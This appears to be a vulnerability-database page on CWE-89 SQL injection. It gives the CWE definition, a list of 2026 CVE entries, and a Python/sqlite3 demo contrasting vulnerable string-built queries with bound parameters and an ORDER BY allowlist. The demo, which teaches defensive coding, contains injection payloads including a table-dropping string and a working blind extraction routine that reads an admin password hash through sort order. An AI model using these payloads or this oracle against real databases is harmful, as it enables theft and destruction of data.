CWE-89

Exploit likelihood: High

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Parent: CWE-943 - Improper Neutralization of Special Elements in Data Query Logic

The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.
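The description above covers two practical shapes of the flaw that the entries below show repeatedly: a value spliced into a WHERE clause (most of the PHP `...php sql injection` entries), and an identifier such as a sort field or column name spliced into ORDER BY, where bound parameters are not available (the Zabbix `sortfield`, LearnDash `filters[orderby_order]` and Parse Server aggregate/distinct field-name entries). The following Python/sqlite3 example is added here and is not code from any product listed on this page; the table, rows, function names and the blind ORDER BY probe are constructed for illustration and go slightly beyond the CWE text by showing why the identifier case needs an allowlist rather than quoting.

```python
import sqlite3
import string

# Constructed sample schema and rows for a self-contained demo (not from any real product).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT, password_hash TEXT);
        INSERT INTO users (name, role, password_hash) VALUES
            ('alice', 'admin', 'h1'),
            ('bob',   'user',  'h2');
    """)
    return conn

# --- Shape 1: a value spliced into WHERE -------------------------------------

def lookup_vulnerable(conn, name):
    # CWE-89: the input becomes part of the SQL text, so a quote character in
    # `name` closes the literal and the rest is parsed as SQL.
    sql = "SELECT id, name, role FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, name):
    # Bound parameter: the value travels separately from the statement text and
    # can never alter its structure, whatever characters it contains.
    return conn.execute(
        "SELECT id, name, role FROM users WHERE name = ?", (name,)
    ).fetchall()

# --- Shape 2: an identifier spliced into ORDER BY ----------------------------

ALLOWED_SORT_COLUMNS = {"id", "name", "role"}

def list_sorted_vulnerable(conn, sort_field):
    # ORDER BY cannot take a bound parameter, so a "sortfield"/"orderby" value
    # copied into the query is still CWE-89 even if every WHERE value is bound.
    return conn.execute("SELECT id, name FROM users ORDER BY " + sort_field).fetchall()

def list_sorted_safe(conn, sort_field):
    # Allowlist the identifier and reject anything else; do not try to escape it.
    if sort_field not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unsupported sort field: %r" % sort_field)
    return conn.execute("SELECT id, name FROM users ORDER BY " + sort_field).fetchall()

# --- What an attacker gets from shape 2 with only row order as feedback ------

def blind_char_oracle(conn, position, guess):
    # The injected CASE flips the sort direction depending on a condition the
    # attacker chooses, so the first row's id leaks one bit per request.
    payload = ("CASE WHEN (SELECT substr(password_hash, %d, 1) FROM users "
               "WHERE role = 'admin') = '%s' THEN id ELSE -id END" % (position, guess))
    rows = list_sorted_vulnerable(conn, payload)
    return rows[0][0] == 1  # ascending id order means the guess was right

def recover_admin_hash(conn, length):
    # Read the admin's password_hash one character at a time through the oracle.
    charset = string.ascii_lowercase + string.digits
    recovered = ""
    for pos in range(1, length + 1):
        for ch in charset:
            if blind_char_oracle(conn, pos, ch):
                recovered += ch
                break
    return recovered

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "x' OR '1'='1"))   # every row: the OR rewrote the WHERE
    print(lookup_safe(db, "x' OR '1'='1"))         # []: treated as a literal name
    print(recover_admin_hash(db, 2))               # 'h1', read via sort order alone
    try:
        list_sorted_safe(db, "id; DROP TABLE users")
    except ValueError as e:
        print("rejected:", e)
```

Against the in-memory database, `lookup_vulnerable(conn, "x' OR '1'='1")` returns every row while `lookup_safe` with the same input returns none, and `recover_admin_hash(conn, 2)` recovers the constructed hash `h1` from row order alone, which is what a "blind, read-only" injection through a sort parameter means in practice. The fix for the identifier case is the allowlist in `list_sorted_safe`: driver quoting functions are designed for string literals, not for column names or expressions, so escaping does not help there.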

19,493 vulnerabilities with CWE-89
CVE-2026-25371 CRITICAL
WordPress Lumise Product Designer plugin < 2.0.9 - SQL Injection vulnerability
CVSS 9.3
CVE-2026-25340 CRITICAL
WordPress Jobmonster theme < 4.8.4 - SQL Injection vulnerability
CVSS 9.3
CVE-2026-25007 HIGH
WordPress ElementInvader Addons for Elementor plugin <= 1.4.2 - SQL Injection vulnerability
CVSS 8.5
CVE-2026-24993 CRITICAL
WordPress Advanced WooCommerce Product Sales Reporting plugin <= 4.1.3 - SQL Injection vulnerability
CVSS 9.3
CVE-2026-24977 HIGH
WordPress Organici Library plugin <= 2.1.2 - SQL Injection vulnerability
CVSS 8.5
CVE-2026-22484 CRITICAL
WordPress Lisfinity Core plugin <= 1.5.0 - SQL Injection vulnerability
CVSS 9.3
CVE-2026-4815 HIGH
SQL Injection vulnerability in Support Board
CVSS 8.8
CVE-2026-4784 HIGH
code-projects Simple Laundry System Parameter checkcheckout.php sql injection
CVSS 7.3
CVE-2026-4783 MEDIUM
itsourcecode College Management System Parameter add-single-student-results.php sql injection
CVSS 6.3
CVE-2026-4781 MEDIUM
SourceCodester Sales and Inventory System HTTP GET Parameter update_purchase.php sql injection
CVSS 6.3
CVE-2026-4780 MEDIUM
SourceCodester Sales and Inventory System HTTP GET Parameter update_out_standing.php sql injection
CVSS 6.3
CVE-2026-4779 MEDIUM
SourceCodester Sales and Inventory System HTTP GET Parameter update_customer_details.php sql injection
CVSS 6.3
CVE-2026-4778 MEDIUM
SourceCodester Sales and Inventory System HTTP GET Parameter update_category.php sql injection
CVSS 6.3
CVE-2026-4777 MEDIUM
SourceCodester Sales and Inventory System POST Parameter view_supplier.php sql injection
CVSS 6.3
CVE-2026-33539 HIGH
Parse Server: SQL injection via aggregate and distinct field names in PostgreSQL adapter
CVSS 7.2
CVE-2026-23921 HIGH
Blind, read-only SQL injection in Zabbix API via sortfield parameter
CVE-2026-30655 MEDIUM
esiclivre/esiclivre <=0.2.2 - SQL Injection
CVSS 6.5
CVE-2026-4662 HIGH
JetEngine <= 3.8.6.1 - Unauthenticated SQL Injection via Listing Grid 'filtered_query' Parameter
CVSS 7.5
CVE-2026-4632 HIGH
itsourcecode Online Enrollment System Parameter index.php sql injection
CVSS 7.3
CVE-2026-4625 HIGH
SourceCodester Online Admission System programmes.php sql injection
CVSS 7.3
CVE-2026-4624 HIGH
SourceCodester Online Library Management System Parameter home.php sql injection
CVSS 7.3
CVE-2026-3079 MEDIUM
LearnDash LMS <= 5.0.3 - Authenticated (Contributor+) SQL Injection via 'filters[orderby_order]' Parameter
CVSS 6.5
CVE-2026-4615 HIGH
Online Catering Reservation 1.0 - SQL Injection
CVSS 7.3
CVE-2026-4614 MEDIUM
itsourcecode sanitize or validate this input Parameter subjects.php sql injection
CVSS 6.3
CVE-2026-4613 HIGH
SourceCodester E-Commerce Site 1.0 - SQL Injection
CVSS 7.3